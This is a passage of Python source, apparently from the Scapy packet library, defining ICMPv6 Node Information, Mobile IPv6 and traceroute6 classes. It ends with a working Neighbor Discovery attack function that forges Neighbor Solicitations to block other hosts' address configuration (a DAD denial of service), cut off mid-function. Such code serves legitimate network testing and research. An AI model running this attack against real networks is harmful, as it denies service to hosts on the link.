return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
        if x == 0 and y == 0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
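# Illustrative sketch (not part of Scapy): computing the padding required
# before an option with alignment requirement 8n+6 (e.g. MIP6OptAltCoA below)
# when the options area already holds 8 octets. This is exactly what
# _MobilityOptionsField.i2m() does further down.
#
#   delta = MIP6OptAltCoA().alignment_delta(8)    # -> 8*((8-6+8-1)/8)+6-8 == 6
#   pad   = PadN(optdata='\x00'*(delta-2))        # 6 octets of padding overall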
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
    x = 2 ; y = 0  # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
        from time import strftime, gmtime
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value "\x00\x08\x09" (concatenation of mhtypes). This is
        # because we need to match BA with BU and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.itervalues():
try:
m = min(x for x, y in k.itervalues() if y)
except ValueError:
continue
for l in k.keys(): # use .keys(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
    Instant TCP traceroute using IPv6:
    traceroute6(target, [maxttl=30], [dport=80], [sport=RandShort()]) -> (TracerouteResult6, unanswered PacketList)
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
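# Hypothetical usage sketch (the target address is a placeholder): run a TCP
# traceroute towards an IPv6 host, then display or graph the result.
#
#   res, unans = traceroute6("2001:db8::1", dport=80, maxttl=20)
#   res.show()
#   res.graph()    # resolves ASes with AS_resolver6() by default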
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
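# Hypothetical usage sketch (addresses are placeholders): send IPv6 traffic
# through an IPv6-in-IPv4 tunnel by swapping in the _IPv6inIP L3 socket.
#
#   conf.L3socket = IPv6inIP(dst="192.0.2.1")           # IPv4 tunnel endpoint
#   send(IPv6(dst="2001:db8::1")/ICMPv6EchoRequest())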
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. This is done by listening for incoming NS messages sent from the
    unspecified address and sending an NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
